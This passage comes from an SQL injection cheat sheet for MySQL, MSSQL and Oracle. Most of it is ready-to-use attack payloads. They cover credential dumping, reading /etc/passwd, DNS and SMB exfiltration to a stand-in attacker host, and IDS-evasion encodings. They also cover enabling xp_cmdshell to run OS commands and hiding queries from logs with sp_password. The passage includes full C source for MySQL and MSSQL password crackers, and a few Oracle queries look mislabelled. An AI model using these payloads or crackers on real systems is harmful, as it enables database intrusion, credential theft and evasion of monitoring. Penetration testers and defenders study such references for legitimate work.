- SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; - Finds the table names for any columns named username.
- SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; - Finds the table names for any columns that contain the word user.
Find Column From Table Name
- SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
- SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';
Avoiding the use of single/double quotations
- UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = 0x61646D696E
- UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
String concatenation
- SELECT concat('a','a','a')
- SELECT 'a' 'd' 'mi' 'n'
- SELECT/*/'a'/*/ 'd'/*/ 'mi'/*/ 'n' (phpMyAdmin)
Privileges
FILE privilege
MySQL 4/5
- ' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username
- ' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y
MySQL 5
- ' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
- ' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y
Out Of Band Channeling
Timing
- BENCHMARK()
- SLEEP() (MySQL 5)
- IF(), (CASE()WHEN)
- ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('test')), false)) - '
DNS (requires FILE privilege)
- SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));
SMB (requires FILE privilege)
- ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt
Reading Files (requires FILE privilege)
- LOAD_FILE()
- UNION SELECT LOAD_FILE('/etc/passwd')-- -
- UNION SELECT LOAD_FILE(0x2F6574632F706173737764)-- -
Note:
- File must be located on the server host
- The basedirectory for load_file() is the @@datadir
- The file must be readable by the MySQL user
- The file size must be less than max_allowed_packet
- UNION SELECT @@max_allowed_packet (default value is 1047552 Byte)
Writing Files (requires FILE privilege)
- INTO OUTFILE/DUMPFILE
- UNION SELECT 'code', null INTO OUTFILE '/tmp/file
Note:
- You can’t overwrite files with INTO OUTFILE
- INTO OUTFILE must be the last statement in the query
- There is no way to encode the pathname, so quotes are required
Stacked Queries with PDO
Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database.
Example:
- AND 1=0; INSERT INTO Users(username,password,priv) VALUES ('BobbyTables', 'kl20da$$','admin');
User Defined Functions
UDF -R S 10/6/10 10:56 AM
Note:URL Encoding your injection can sometimes be useful for IDS evasion.
- %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31
- SELECT %74able_%6eame FROM information_schema.tables;
Futhermore, by using # followed by a newline, we can split the query into separate lines, sometimes tricking the IDS.
1'#AND 0#UNION#SELECT@tmp:=table_name x FROM#`information_schema`.tables LIMIT 1#URL Encoded: 1'%23%0AAND 0%23%0AUNION%23%0ASELECT@tmp:=table_name x FROM%23%0A`information_schema`.tables LIMIT 1%23Allowed Intermediary Characters after AND/OR
- 2B
- 2D
- 7E
Example: SELECT 1 FROM table WHERE 1=1 AND-+-+-+-+~~((1))
$prefixes = array(" ", "+", "-", "~", "!", "@", " ");
- 09
- 0A
- 0B
- 0D
- 0C
- 20
- A0
Example: SELECT 1 FROM information_schema%20%0C%20.%20%09tables;Operators
$operators = array("^", "=", "!=", "%", "/", "*", "&", "&&", "|", "||", "<", ">", ">>", "<<", ">=", "<=", "<>", "<=>", "AND", "OR", "XOR", "DIV", "LIKE", "RLIKE", "SOUNDS LIKE", "REGEXP", "IS", "NOT");Constants
- current_user
- null, \N
- true, false
MySQL Functions()
MySQL Password Hashing (Taken from MySQL website)
Prior to MySQL 4.1, password hashes computed by the PASSWORD() function are 16 bytes long. Such hashes look like this:+-----------------------------+| PASSWORD('mypass') |+-----------------------------+| 6f8c114b58f2ce9e |+-----------------------------+As of MySQL 4.1, the PASSWORD() function has been modified to produce a longer 41-byte hash value:
+-----------------------------------------------------------------------+| PASSWORD('mypass') |+-----------------------------------------------------------------------+| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+-----------------------------------------------------------------------+MySQL Password() Cracker
Cain & Abel, JTR are capable of cracking MySQL 3.x-6.x passwords.MySQL < 4.1 Password Cracker
<copypaste>This tool is a high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character password containing any printable ASCII characters in a matter of hours on an ordinary PC.</copypaste>/* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast
* $ MySQLfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/#include <stdio.h>
typedef unsigned long u32;
/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126/* Maximum length of password */
#define MAX_LEN 12#define MASK 0x7fffffffL
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
int i, c;
u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
u32 newstate1, newstate2, newstate3;
u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
i = -1;
sum = 7;
state1_ary[0] = 1345345333L;
state2_ary[0] = 0x12345671L;while (1) {
while (i < stop) {
i++;
pass_ary[i] = MIN_CHAR;
step_ary[i] = (state1_ary[i] & 0x3f) + sum;
xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
sum += MIN_CHAR;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}state1 = state1_ary[i+1];
state2 = state2_ary[i+1];
step = (state1 & 0x3f) + sum;
xor1 = step*MIN_CHAR + (state1 << 8);
xor2 = (state2 << 8) ^ state1;for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
newstate2 = state2 + (xor1 ^ xor2);
newstate1 = state1 ^ xor1;newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
div = (newstate1 & 0x3f) + sum + c;
diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
if (diff % div != 0) continue;
d = diff / div;
if (d < MIN_CHAR || d > MAX_CHAR) continue;div = (newstate3 & 0x3f) + sum + c + d;
diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
if (diff % div != 0) continue;
e = diff / div;
if (e < MIN_CHAR || e > MAX_CHAR) continue;pass_ary[i+1] = c;
pass_ary[i+2] = d;
pass_ary[i+3] = e;
return 1;
}while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
sum -= MAX_CHAR;
i--;
}
if (i < 0) break;
pass_ary[i]++;
xor_ary[i] += step_ary[i];
sum++;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}return 0;
}void crack(char *hash)
{
int i, len;
u32 targ1, targ2, targ3;
int pass[MAX_LEN];if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
printf("Invalid password hash: %s\n", hash);
return;
}
printf("Hash: %08lx%08lx\n", targ1, targ2);
targ3 = targ2 - targ1;
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);for (len = 3; len <= MAX_LEN; len++) {
printf("Trying length %d\n", len);
if ( crack0(len-4, targ1, targ3, pass) ) {
printf("Found pass: ");
for (i = 0; i < len; i++)
putchar(pass[i]);
putchar('\n');
break;
}
}
if (len > MAX_LEN)
printf("Pass not found\n");
}int main(int argc, char *argv[])
{
int i;
if (argc <= 1)
printf("usage: %s hash\n", argv[0]);
for (i = 1; i < argc; i++)
crack(argv[i]);
return 0;
}
MSSQL
Default Databases
- pubs
- model
- msdb
- tempdb
- northwind
- information_schema (>= 2000)
Comment Out Query
- /*
- --
- %00
Testing Version
- @@VERSION
- VERSION()
Retrieving user names/passwords
- Database.Table:
- master..syslogins, master..sysprocesses
Columns:
- name, loginameCurrent User: user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database Credentials:
- SELECT user, password FROM master.dbo.sysxlogins
Example:
- SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; -- Returns current user
- SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);-- Is Admin?
Database Server Hostname
- @@servername
- SERVERPROPERTY()
Example:
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition') --
Only available >= SQL Server 2005Listing Databases
- Table: master..sysdatabases
- Column: name
- Function: DB_NAME(i)
Example:
- SELECT name FROM master..sysdatabases;
- SELECT DB_NAME(5);
We can retrieve the tables/columns from two different databases, information_schema.tables, information_schema.columns or from master..sysobjects, masters..syscolumns.Tables & Columns
Retrieving Tables
- Union:
- UNION SELECT name FROM master..sysobjects WHERE xtype='U' --
Blind:
- AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
Error Based:
- AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
- AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
Note:
Xtype = 'U' is for User-defined tables. You can use 'V' for views.Retrieving Columns
- Union:
- UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')
Blind:
- AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'
Error Based:
- AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
- AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))
Retrieving Multiple Tables/Columns at once
The following 3 queries will create a temporary table/column and insert all the user-defined tables into it, it will then dump the table content and finish by deleting the table.
- Create Temp Table/Column and Insert Data:
- AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
Dump Content:
- AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
Delete Table:
- AND 1=0; DROP TABLE TMP_DB;
Note:
You can encode your query in hex to "obfuscate" your attack.' and 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--sp_passwordOPENROWSET Attacks
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"')System Command Execution
Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.EXEC master.dbo.xp_cmdshell 'cmd'Prior to MSSQL 2005, xp_cmdshell is disabled by default, but can easily be activated with the following queries:EXEC sp_configure 'show advanced options', 1EXEC sp_configure reconfigureEXEC sp_configure 'xp_cmdshell', 1EXEC sp_configure reconfigure
Alternatively, you can create your own procedure to achieve the same resultsDECLARE @execmd INTEXEC SP_OACREATE 'wscript.shell', @execmd OUTPUTEXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'If the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command.EXEC sp_configure 'show advanced options', 1EXEC sp_configure reconfigureEXEC sp_configure 'OLE Automation Procedures', 1EXEC sp_configure reconfigureExample:
- ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
- ' UNION SELECT tbl FROM TMP_DB--
- ' DROP TABLE TMP_DB--
This example checks to see if xp_cmdshell is loaded, if it is, it checks if it is active and then proceeds to run the 'dir' command and inserts the results into TMP_DB.SP_PASSWORD (Hiding Query)
Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.Example: ' and 1=1--sp_password-- 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.Stacked Queries
- ' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2')
Fuzzing and Obfuscation
Encodings
Hex
- ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--sp_password
URL Encoded
- %53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%64%75%61%6c
Unicode
- %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0031%u0020%u0046%u0052%u004f%u004d%u0020%u0064%u0075%u0061%u006c
HTML Entities
- AND 1=1 (&# has to be URL Encoded)
- %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
Allowed Intermediary Characters:
- 01-1F
- 25
Example: S%E%L%E%C%T%01column%02FROM%03table%00Note: The percentage signs in between SELECT is only possible on ASP
- 28
- 29
Example: UNION(SELECT(column)FROM(table))
- 5B
- 5D
- 22
Example: SELECT"table_name"FROM[information_schema].[tables]Allowed Intermediary Characters after AND/OR
- 01-1F
- 2B
- 2D
- 2E
- 5C
- 7E
Example: SELECT 1FROM[table]WHERE\1=\1AND\1=\1MSSQL Password Hashing
Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercased version.Example:0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE9 ...
1C0784B911D76BF4EB124550ACABDFD1457MSSQL Password Cracker
///////////////////////////////////////////////////////////////////////////////////// SQLCrackCl//// This will perform a dictionary attack against the// upper-cased hash for a password. Once this// has been discovered try all case variant to work// out the case sensitive password.//// This code was written by David Litchfield to// demonstrate how Microsoft SQL Server 2000// passwords can be attacked. This can be// optimized considerably by not using the CryptoAPI.//// (Compile with VC++ and link with advapi32.lib// Ensure the Platform SDK has been installed, too!)////////////////////////////////////////////////////////////////////////////////////#include <stdio.h>#include <windows.h>#include <wincrypt.h>FILE *fd=NULL;char *lerr = "\nLength Error!\n";int wd=0;int OpenPasswordFile(char *pwdfile);int CrackPassword(char *hash);int main(int argc, char *argv[]){int err = 0;if(argc !=3){printf("\n\n*** SQLCrack *** \n\n");printf("C:\\>%s hash passwd-file\n\n",argv[0]);printf("David Litchfield (david@ngssoftware.com)\n");printf("24th June 2002\n");return 0;}err = OpenPasswordFile(argv[2]);if(err !=0){return printf("\nThere was an error opening the password file %s\n",argv[2]);}err = CrackPassword(argv[1]);fclose(fd);printf("\n\n%d",wd);return 0;}int OpenPasswordFile(char *pwdfile){fd = fopen(pwdfile,"r");if(fd)return 0;elsereturn 1;}int CrackPassword(char *hash){char phash[100]="";char pheader[8]="";char pkey[12]="";char pnorm[44]="";char pucase[44]="";char pucfirst[8]="";char wttf[44]="";char uwttf[100]="";char *wp=NULL;char *ptr=NULL;int cnt = 0;int count = 0;unsigned int key=0;unsigned int t=0;unsigned int address = 0;unsigned char cmp=0;unsigned char x=0;HCRYPTPROV hProv=0;HCRYPTHASH hHash;DWORD hl=100;unsigned char szhash[100]="";int len=0;if(strlen(hash) !=94){return printf("\nThe password hash is too short!\n");}if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X')){hash = hash + 2;strncpy(pheader,hash,4);printf("\nHeader\t\t: %s",pheader);if(strlen(pheader)!=4)return printf("%s",lerr);hash = hash + 4;strncpy(pkey,hash,8);printf("\nRand key\t: %s",pkey);if(strlen(pkey)!=8)return printf("%s",lerr);hash = hash + 8;strncpy(pnorm,hash,40);printf("\nNormal\t\t: %s",pnorm);if(strlen(pnorm)!=40)return printf("%s",lerr);hash = hash + 40;strncpy(pucase,hash,40);printf("\nUpper Case\t: %s",pucase);if(strlen(pucase)!=40)return printf("%s",lerr);strncpy(pucfirst,pucase,2);sscanf(pucfirst,"%x",&cmp);}else{return printf("The password hash has an invalid format!\n");}printf("\n\n Trying...\n");if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0)){if(GetLastError()==NTE_BAD_KEYSET){// KeySet does not exist. So create a new keysetif(!CryptAcquireContext(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_NEWKEYSET )){printf("FAILLLLLLL!!!");return FALSE;}}}while(1){// get a word to try from the fileZeroMemory(wttf,44);if(!fgets(wttf,40,fd))return printf("\nEnd of password file. Didn't find the password.\n");wd++;len = strlen(wttf);wttf[len-1]=0x00;ZeroMemory(uwttf,84);// Convert the word to UNICODEwhile(count < len){uwttf[cnt]=wttf[count];cnt++;uwttf[cnt]=0x00;count++;cnt++;}len --;wp = &uwttf;sscanf(pkey,"%x",&key);cnt = cnt - 2;// Append the random stuff to the end of// the uppercase unicode passwordt = key >> 24;x = (unsigned char) t;uwttf[cnt]=x;cnt++;t = key << 8;t = t >> 24;x = (unsigned char) t;uwttf[cnt]=x;cnt++;t = key << 16;t = t >> 24;x = (unsigned char) t;uwttf[cnt]=x;cnt++;t = key << 24;t = t >> 24;x = (unsigned char) t;uwttf[cnt]=x;cnt++;// Create the hashif(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash)){printf("Error %x during CryptCreatHash!\n", GetLastError());return 0;}if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0)){printf("Error %x during CryptHashData!\n", GetLastError());return FALSE;}CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);// Test the first byte only. Much quicker.if(szhash[0] == cmp){// If first byte matches try the restptr = pucase;cnt = 1;while(cnt < 20){ptr = ptr + 2;strncpy(pucfirst,ptr,2);sscanf(pucfirst,"%x",&cmp);if(szhash[cnt]==cmp)cnt ++;else{break;}}if(cnt == 20){// We've found the passwordprintf("\nA MATCH!!! Password is %s\n",wttf);return 0;}}count = 0;cnt=0;}return 0;}ORACLE
Default Databases
- SYSTEM
- SYSAUX
Comment Out Query
- --
Testing Version
- SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
- SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
- SELECT version FROM v$instance
Retrieving Users/Passwords
- SELECT username FROM all_users
- SELECT name, password from sys.user$ (Privileges required, <= 10g)
- SELECT name, spare4 from sys.user$ (Privileges required, 11g)
Retrieving Databases
Current Database
- SELECT name FROM v$database;
- SELECT instance_name FROM v$instance
- SELECT global_name FROM global_name
- SELECT SYS.DATABASE_NAME FROM DUAL
User Databases
Tables & Columns
Retrieving Tables
- SELECT table_name FROM all_tables
Retrieving Columns
- SELECT column_name FROM all_tab_columns
Finding Tables from Column Name
- SELECT column_name FROM all_tab_columns WHERE table_name = 'Users'
Finding Column From Table Name
- SELECT table_name FROM all_tab_tables WHERE column_name = 'password'
Fuzzing and Obfuscation
Avoiding the use of single/double quotations
Unlike other RDBMS, Oracle allows us to reference table/column names encoded.
- SELECT chr(32)||chr(92)||chr(93) FROM dual
- SELECT 0x09120911091
Out Of Band Channeling
Time Delay
- SELECT UTL_INADDR.get_host_address('non-existant-domain.zom') FROM dual
Heavy Query Time delays
- AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1))